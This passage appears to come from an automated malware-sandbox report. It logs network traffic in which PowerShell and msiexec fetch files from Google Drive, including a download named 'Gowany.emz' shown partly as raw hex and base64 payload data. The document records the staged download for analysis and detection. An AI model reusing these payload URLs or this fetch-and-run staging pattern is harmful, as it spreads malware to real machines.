                                                                  Nov 20, 2024 16:54:02.525719881 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.525799036 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.525839090 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.526603937 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.526683092 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.526691914 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.526729107 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.527524948 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.527565002 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.527781010 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.527823925 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.527832031 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.527858973 CET44349805142.250.181.1192.168.2.5
                                                                  Nov 20, 2024 16:54:02.527873993 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.527962923 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.531282902 CET49805443192.168.2.5142.250.181.1
                                                                  Nov 20, 2024 16:54:02.531297922 CET44349805142.250.181.1192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 20, 2024 16:53:14.747524023 CET5682153192.168.2.51.1.1.1
                                                                  Nov 20, 2024 16:53:14.888644934 CET53568211.1.1.1192.168.2.5
                                                                  Nov 20, 2024 16:53:17.582505941 CET5193153192.168.2.51.1.1.1
                                                                  Nov 20, 2024 16:53:17.815152884 CET53519311.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 20, 2024 16:53:14.747524023 CET192.168.2.51.1.1.10xd460Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                  Nov 20, 2024 16:53:17.582505941 CET192.168.2.51.1.1.10x7dccStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 20, 2024 16:53:14.888644934 CET1.1.1.1192.168.2.50xd460No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                  Nov 20, 2024 16:53:17.815152884 CET1.1.1.1192.168.2.50x7dccNo error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • drive.google.com
                                                                  • drive.usercontent.google.com

                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549718172.217.19.1744437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-20 15:53:16 UTC215OUTGET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: drive.google.com
                                                                  Connection: Keep-Alive
                                                                  2024-11-20 15:53:17 UTC1766INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:17 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-nmoQoNEwS1_R-9ViBgmz0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549723172.217.19.1744437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-20 15:53:23 UTC97OUTGET /uc?export=download&id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j HTTP/1.1
                                                                  Host: drive.google.com
                                                                  2024-11-20 15:53:24 UTC1319INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:24 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-7QOKSIQNMt54WMvNrzLm3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Server: ESF
                                                                  Content-Length: 0
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  X-Content-Type-Options: nosniff
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.549729142.250.181.14437364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-20 15:53:26 UTC139OUTGET /download?id=1ziYxCjUvj99QtXQjBjAxMsemo3EX9D8j&export=download HTTP/1.1
                                                                  Host: drive.usercontent.google.com
                                                                  Connection: Keep-Alive
                                                                  2024-11-20 15:53:29 UTC4904INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Content-Security-Policy: sandbox
                                                                  Content-Security-Policy: default-src 'none'
                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                  X-Content-Security-Policy: sandbox
                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                  Cross-Origin-Resource-Policy: same-site
                                                                  X-Content-Type-Options: nosniff
                                                                  Content-Disposition: attachment; filename="Gowany.emz"
                                                                  Access-Control-Allow-Origin: *
                                                                  Access-Control-Allow-Credentials: false
                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 459852
                                                                  Last-Modified: Wed, 20 Nov 2024 08:40:18 GMT
                                                                  X-GUploader-UploadID: AFiumC4PFP0nWPOXXQ3zIEDjNx7rWQ7tz7jKsJveiEC3a4CgT-5GSdSv7YTtYsPxDnnhltbpUg
                                                                  Date: Wed, 20 Nov 2024 15:53:28 GMT
                                                                  Expires: Wed, 20 Nov 2024 15:53:28 GMT
                                                                  Cache-Control: private, max-age=0
                                                                  X-Goog-Hash: crc32c=BfWl0g==
                                                                  Server: UploadServer
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2024-11-20 15:53:29 UTC4904INData Raw: 63 51 47 62 36 77 49 64 74 72 73 77 6e 68 59 41 63 51 47 62 36 77 4a 64 70 67 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 4d 62 6e 61 6a 48 45 42 6d 33 45 42 6d 34 48 78 37 7a 6d 71 33 65 73 43 39 6c 4e 78 41 5a 75 42 77 53 4a 2f 6a 36 35 78 41 5a 76 72 41 75 6e 76 63 51 47 62 36 77 4c 41 73 62 70 71 48 50 4a 4f 63 51 47 62 36 77 49 6b 5a 58 45 42 6d 33 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 49 4e 50 65 73 43 6c 4a 50 52 34 75 73 43 57 68 37 72 41 6e 71 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6d 51 35 4b 73 44 66 4d 7a 72 41 75 54 30 63 51 47 62 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 63 51 47 62 63 51 47 62 67 63 50 4d 2b 2b 30 42 36 77 49 62 74 48 45 42 6d 37 70 76 68 48 77 6a 63 51 47 62 63 51 47 62 67 65 70 48 30 56 34
                                                                  Data Ascii: cQGb6wIdtrswnhYAcQGb6wJdpgNcJARxAZtxAZu5MbnajHEBm3EBm4Hx7zmq3esC9lNxAZuBwSJ/j65xAZvrAunvcQGb6wLAsbpqHPJOcQGb6wIkZXEBm3EBmzHKcQGbcQGbiRQL6wINPesClJPR4usCWh7rAnqbg8EEcQGbcQGbgfmQ5KsDfMzrAuT0cQGbi0QkBHEBm3EBm4nDcQGbcQGbgcPM++0B6wIbtHEBm7pvhHwjcQGbcQGbgepH0V4
                                                                  2024-11-20 15:53:29 UTC4889INData Raw: 75 6a 33 36 51 65 4a 48 4d 6e 69 37 6e 58 65 72 4f 66 48 61 4e 6a 63 2f 35 58 58 6d 6a 63 4e 72 77 66 49 35 69 2b 6e 51 39 39 30 77 33 62 66 66 31 6c 45 35 69 37 36 6b 79 31 49 77 39 56 31 41 35 52 37 6f 34 44 6a 53 75 55 51 73 56 49 47 6a 77 54 62 6c 2b 79 78 79 53 46 6a 59 6e 6d 59 4d 70 4c 58 2f 45 57 6e 44 4e 79 75 75 64 55 30 4a 34 30 47 6d 6f 4f 57 77 77 6e 39 4d 6d 70 73 52 43 65 6d 55 6b 46 6d 4a 71 68 63 74 77 31 6b 61 69 4f 4c 67 47 6a 54 78 35 79 38 4b 48 50 59 6d 49 4c 4e 4c 49 46 58 34 4a 66 31 61 77 52 34 72 75 37 4e 54 39 56 33 43 6e 66 31 43 78 4b 38 30 62 57 55 6b 39 56 59 7a 70 2b 48 58 74 30 34 4c 74 71 4c 6d 6f 74 61 79 4b 37 73 64 31 48 79 4a 4b 5a 46 65 31 49 67 32 66 67 69 64 59 6a 76 32 6a 57 39 6b 6f 54 54 51 6e 75 6e 66 46 31 6c
                                                                  Data Ascii: uj36QeJHMni7nXerOfHaNjc/5XXmjcNrwfI5i+nQ990w3bff1lE5i76ky1Iw9V1A5R7o4DjSuUQsVIGjwTbl+yxySFjYnmYMpLX/EWnDNyuudU0J40GmoOWwwn9MmpsRCemUkFmJqhctw1kaiOLgGjTx5y8KHPYmILNLIFX4Jf1awR4ru7NT9V3Cnf1CxK80bWUk9VYzp+HXt04LtqLmotayK7sd1HyJKZFe1Ig2fgidYjv2jW9koTTQnunfF1l
                                                                  2024-11-20 15:53:29 UTC1323INData Raw: 56 42 53 36 6f 57 36 34 5a 58 6e 75 58 79 37 6f 65 76 4f 66 32 42 6f 4e 65 42 62 35 5a 73 4b 6b 43 49 36 68 77 4e 39 73 54 4c 76 77 79 67 57 62 5a 59 77 78 63 58 76 34 44 49 35 69 32 7a 63 52 30 4d 77 33 62 73 66 79 2b 63 78 65 2f 36 4e 54 59 41 2f 70 79 38 69 41 45 67 45 50 70 56 69 38 4d 5a 53 57 50 56 79 66 58 32 41 72 58 33 71 63 74 5a 37 6c 32 4e 78 76 68 30 69 4a 56 4b 6d 69 5a 6c 65 62 54 48 78 61 6a 4f 34 66 4f 4f 49 4b 62 49 46 31 54 6d 2b 6d 4a 48 43 65 6a 44 41 30 35 2b 65 33 44 46 75 41 54 6e 33 43 70 6b 7a 54 75 65 75 59 72 5a 70 55 43 34 31 63 69 4b 74 4a 2b 5a 36 38 59 63 42 7a 75 30 46 37 77 47 4a 69 6d 2b 31 51 74 72 54 33 75 6d 6f 76 67 49 59 34 76 56 49 59 7a 50 78 61 6a 4f 34 66 4f 61 4e 4d 71 54 39 59 6a 6d 4c 4d 4a 35 38 41 44 44 46
                                                                  Data Ascii: VBS6oW64ZXnuXy7oevOf2BoNeBb5ZsKkCI6hwN9sTLvwygWbZYwxcXv4DI5i2zcR0Mw3bsfy+cxe/6NTYA/py8iAEgEPpVi8MZSWPVyfX2ArX3qctZ7l2Nxvh0iJVKmiZlebTHxajO4fOOIKbIF1Tm+mJHCejDA05+e3DFuATn3CpkzTueuYrZpUC41ciKtJ+Z68YcBzu0F7wGJim+1QtrT3umovgIY4vVIYzPxajO4fOaNMqT9YjmLMJ58ADDF
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 2f 56 73 2f 57 67 78 35 59 79 54 31 55 44 75 70 34 54 58 70 77 47 68 52 51 78 4d 36 63 53 79 32 62 4d 51 71 41 68 66 6c 46 4c 50 59 36 48 57 7a 50 37 47 51 6d 36 4e 6b 35 43 2f 47 62 78 54 33 73 66 57 36 63 78 70 47 39 4c 31 74 36 4c 50 46 41 47 36 31 75 48 79 2b 76 63 6e 66 73 54 4c 69 6a 37 37 31 6a 33 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 62 66 6a 6d 69 4e 78 42 30 71 54 36 69 2f 37 4e 44 54 79 77 4d 72 69 55 66 71 32 38 66 4f 4f 49 46 5a 70 31 6a 44 6d 4f 42 31 2f 33 45 44 44 41 6f 2f 59 36 34 4f 76 67 4f 4e 47 78 62 79 77 4c 65 67 65 73 31 75 6b 45 4f 75 62 52 57 56 58 59 73 45 4e 31 71 47 4e 35 55 75 4e 47 39 31 42 41 70 43 59 2b 62 58 69 61 56 65 30 4f 43 41 33 67 6f 4f 74 36 59 4b 4e 73 32 67 76
                                                                  Data Ascii: /Vs/Wgx5YyT1UDup4TXpwGhRQxM6cSy2bMQqAhflFLPY6HWzP7GQm6Nk5C/GbxT3sfW6cxpG9L1t6LPFAG61uHy+vcnfsTLij771j3yxMrh8sTK4fLEyuHyxMrh8sTK4fLEybfjmiNxB0qT6i/7NDTywMriUfq28fOOIFZp1jDmOB1/3EDDAo/Y64OvgONGxbywLeges1ukEOubRWVXYsEN1qGN5UuNG91BApCY+bXiaVe0OCA3goOt6YKNs2gv
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 57 7a 6b 54 44 64 6c 62 62 79 79 6a 6d 54 2f 51 5a 2f 69 44 67 74 76 6b 50 71 44 7a 6a 6c 6d 41 6e 2f 4d 44 64 77 53 79 71 6a 71 71 31 62 37 6d 58 55 6c 4a 4f 33 48 71 78 53 55 75 4f 53 7a 6f 6c 49 49 33 30 4d 6c 6b 32 39 79 56 35 6c 50 30 41 71 63 2f 68 76 57 37 51 50 6f 49 61 75 33 6f 65 4c 6a 62 67 53 61 37 33 49 45 4f 70 34 41 4e 4b 4e 6a 77 6a 30 34 43 54 79 64 39 41 4b 5a 66 30 36 4b 76 6c 65 4d 63 45 76 4d 37 68 38 44 76 59 63 67 6b 4d 39 66 30 32 64 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 78 69 71 66 45 66 4e 57 55 48 2f 4b 6a 6d 32 76 31 47 6d 68 63 72 58 62 4e 50 35 38 4d 77 78 66 31 32 64 6e 34 52 5a 62 4e 2f 39 58 63 69 67 50 57 47 46 36 50 58 70 64 49 4c 56 6d 37 66 64 65 36 51 37 71 4f 50 6f
                                                                  Data Ascii: WzkTDdlbbyyjmT/QZ/iDgtvkPqDzjlmAn/MDdwSyqjqq1b7mXUlJO3HqxSUuOSzolII30Mlk29yV5lP0Aqc/hvW7QPoIau3oeLjbgSa73IEOp4ANKNjwj04CTyd9AKZf06KvleMcEvM7h8DvYcgkM9f02dMrh8sTK4fLEyuHyxMrh8sTK4fLEyuHxiqfEfNWUH/Kjm2v1GmhcrXbNP58Mwxf12dn4RZbN/9XcigPWGF6PXpdILVm7fde6Q7qOPo
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 67 6f 6e 37 76 2b 6a 4e 44 54 79 77 4d 72 69 77 56 79 6a 30 37 67 46 63 39 68 2b 2f 61 55 54 5a 62 36 6e 57 77 6f 74 55 54 31 42 52 79 5a 6b 5a 57 65 4a 6a 76 49 41 6a 77 38 64 48 77 4b 52 65 74 76 36 4f 6c 46 71 6c 76 48 78 39 33 38 30 33 46 67 54 2f 5a 57 54 58 4d 4d 45 48 53 78 35 4a 53 44 30 2b 4a 36 59 4c 6c 63 38 4a 7a 6e 75 53 31 6d 41 43 5a 67 66 45 4e 66 31 44 6b 44 6c 6d 32 62 4e 4b 31 73 58 65 58 66 57 4c 71 63 66 43 30 63 46 55 64 6f 38 74 75 58 71 6f 56 58 4a 45 51 66 6a 30 6d 41 30 62 41 54 72 6b 64 48 6a 43 63 6e 4a 57 4e 59 71 2f 74 4a 36 4a 65 56 4a 62 70 43 69 52 76 4d 50 2b 4f 47 39 4a 59 65 4c 33 39 6a 34 78 2b 63 45 7a 75 48 7a 69 69 53 54 6c 53 58 51 35 6a 35 79 38 51 37 34 77 32 58 6c 6f 62 76 34 35 6a 2f 34 30 58 67 63 77 77 51 64
                                                                  Data Ascii: gon7v+jNDTywMriwVyj07gFc9h+/aUTZb6nWwotUT1BRyZkZWeJjvIAjw8dHwKRetv6OlFqlvHx93803FgT/ZWTXMMEHSx5JSD0+J6YLlc8JznuS1mACZgfENf1DkDlm2bNK1sXeXfWLqcfC0cFUdo8tuXqoVXJEQfj0mA0bATrkdHjCcnJWNYq/tJ6JeVJbpCiRvMP+OG9JYeL39j4x+cEzuHziiSTlSXQ5j5y8Q74w2Xlobv45j/40XgcwwQd
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 68 38 73 54 4b 34 76 75 73 6d 49 42 61 74 57 4b 67 64 50 4e 62 30 55 71 62 78 51 37 30 75 44 72 57 61 6f 32 55 48 6e 31 48 71 5a 50 31 32 44 70 68 74 6d 62 4e 2f 6e 55 34 6e 51 79 30 74 75 31 6c 39 69 4b 2b 42 70 38 67 2f 41 51 49 52 6a 52 6e 32 75 44 51 45 77 43 57 4c 34 53 59 52 35 50 36 68 36 67 77 4e 62 69 75 65 6b 4b 6d 63 75 32 7a 79 4e 64 48 33 35 6e 7a 38 50 4b 66 6f 56 44 6d 47 43 54 6e 6e 2f 59 55 57 74 78 52 35 53 65 72 47 49 64 39 74 6b 44 44 41 70 33 6e 52 68 54 6d 4f 53 68 35 4c 44 7a 44 41 67 31 6a 57 6e 6a 6d 2b 78 50 56 6d 42 7a 67 6f 2b 77 4b 49 78 42 75 67 65 71 49 51 73 56 37 39 52 69 6b 48 57 35 77 77 64 79 4b 4e 50 4e 55 77 70 36 67 57 69 79 7a 42 63 73 2f 51 65 79 57 75 65 43 59 77 42 70 77 54 67 46 4a 38 39 51 54 78 75 58 79 78 6a
                                                                  Data Ascii: h8sTK4vusmIBatWKgdPNb0UqbxQ70uDrWao2UHn1HqZP12DphtmbN/nU4nQy0tu1l9iK+Bp8g/AQIRjRn2uDQEwCWL4SYR5P6h6gwNbiuekKmcu2zyNdH35nz8PKfoVDmGCTnn/YUWtxR5SerGId9tkDDAp3nRhTmOSh5LDzDAg1jWnjm+xPVmBzgo+wKIxBugeqIQsV79RikHW5wwdyKNPNUwp6gWiyzBcs/QeyWueCYwBpwTgFJ89QTxuXyxj
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 4d 37 68 38 44 31 4c 79 44 52 76 2b 50 5a 4d 46 43 79 39 30 47 56 66 6e 61 35 52 30 4c 48 61 71 70 64 4b 57 68 4b 75 47 36 38 70 6b 52 6c 68 75 4c 69 79 31 58 58 7a 64 41 2b 6e 30 4e 61 57 72 34 38 63 46 34 62 4e 57 71 41 55 6d 64 76 31 48 55 54 2f 4f 37 72 4e 2b 62 56 77 6a 78 43 70 39 4c 64 4a 65 32 51 30 34 2b 38 75 66 76 39 34 6c 50 73 56 74 79 65 38 43 67 55 77 4f 43 30 6e 74 45 30 36 6f 79 62 79 41 2b 63 4e 6d 7a 4a 71 58 35 4f 4c 33 42 4d 69 35 66 4c 48 61 63 68 57 31 4d 75 72 47 33 64 78 41 2b 6a 44 41 34 6c 41 4e 6d 7a 6d 2b 65 77 77 44 72 4f 43 75 4d 5a 32 77 49 79 58 34 65 6b 57 37 75 68 69 46 79 63 62 54 32 63 55 58 34 2f 59 77 6c 41 4a 54 56 69 54 52 48 57 4e 67 5a 42 4a 46 7a 32 38 52 55 47 47 73 6d 42 35 6a 79 65 73 78 35 49 71 56 76 44 6b
                                                                  Data Ascii: M7h8D1LyDRv+PZMFCy90GVfna5R0LHaqpdKWhKuG68pkRlhuLiy1XXzdA+n0NaWr48cF4bNWqAUmdv1HUT/O7rN+bVwjxCp9LdJe2Q04+8ufv94lPsVtye8CgUwOC0ntE06oybyA+cNmzJqX5OL3BMi5fLHachW1MurG3dxA+jDA4lANmzm+ewwDrOCuMZ2wIyX4ekW7uhiFycbT2cUX4/YwlAJTViTRHWNgZBJFz28RUGGsmB5jyesx5IqVvDk
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 44 2f 41 41 42 39 42 4b 2f 30 41 77 69 68 49 78 73 58 73 48 45 4a 6d 69 48 78 43 79 62 2b 38 7a 30 67 39 49 34 36 56 6e 4b 6d 4f 63 4c 4e 78 71 77 4c 66 6b 71 69 78 51 35 4e 44 4c 74 69 4c 6a 71 6e 69 33 36 78 4d 74 35 7a 64 67 57 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 66 4a 54 51 31 30 62 79 48 7a 53 39 4b 63 75 6a 5a 57 79 76 51 46 58 31 77 70 76 50 64 54 72 67 73 31 6f 4a 44 69 2f 5a
                                                                  Data Ascii: D/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAD/AAB9BK/0AwihIxsXsHEJmiHxCyb+8z0g9I46VnKmOcLNxqwLfkqixQ5NDLtiLjqni36xMt5zdgW4fLEyuHyxMrh8sTK4fLEyuHyxMrh8sfJTQ10byHzS9KcujZWyvQFX1wpvPdTrgs1oJDi/Z
                                                                  2024-11-20 15:53:29 UTC1390INData Raw: 75 48 79 78 50 62 6c 73 5a 44 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 59 6b 68 38 42 67 56 67 41 73 53 76 67 55 33 39 51 7a 37 32 53 41 57 7a 53 69 35 4d 47 43 72 39 51 38 2b 31 34 74 2b 7a 53 6d 63 51 41 51 55 73 4c 62 74 59 64 61 47 76 50 59 54 49 4b 4a 6b 44 52 6a 68 6c 66 79 54 32 78 6f 6f 71 50 42 64 43 39 75 73 63 35 51 6d 44 68 42 33 61 42 2f 53 37 35 4d 42 68 72 46 44 34 75 56 65 2b 47 64 6f 4b 43 76 2f 4f 30 52 31 54 70 46 67 69 6f 34 72 58 4e 4f 6e 67 52 45 52 6f 33 6e 4e 32 41 4c 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 4d 72 68 38 73 54 4b 34 66 4c 45 79 75 48 79 78 36 32 4a 33 66 6c 6d 5a 72 4d 73 55 34 46 4f 63 42 35 52 71 66 55 33 41 6d 57 45 54 4e 46 68 77 2b 70 35 43 66 54 37 72 57 71 56
                                                                  Data Ascii: uHyxPblsZDK4fLEyuHyxMrh8sTK4fLEyuHyxMrh8Ykh8BgVgAsSvgU39Qz72SAWzSi5MGCr9Q8+14t+zSmcQAQUsLbtYdaGvPYTIKJkDRjhlfyT2xooqPBdC9usc5QmDhB3aB/S75MBhrFD4uVe+GdoKCv/O0R1TpFgio4rXNOngRERo3nN2ALh8sTK4fLEyuHyxMrh8sTK4fLEyuHyx62J3flmZrMsU4FOcB5RqfU3AmWETNFhw+p5CfT7rWqV


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.549799172.217.19.1744438020C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-20 15:53:55 UTC216OUTGET /uc?export=download&id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: drive.google.com
                                                                  Cache-Control: no-cache
                                                                  2024-11-20 15:53:56 UTC1766INHTTP/1.1 303 See Other
                                                                  Content-Type: application/binary
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Wed, 20 Nov 2024 15:53:56 GMT
                                                                  Location: https://drive.usercontent.google.com/download?id=1CeREBSpXrrZMtDac8YKiGsgnAXZaGzYT&export=download
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                  Content-Security-Policy: script-src 'nonce-FAil_2IwX45kT0kE2elpFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
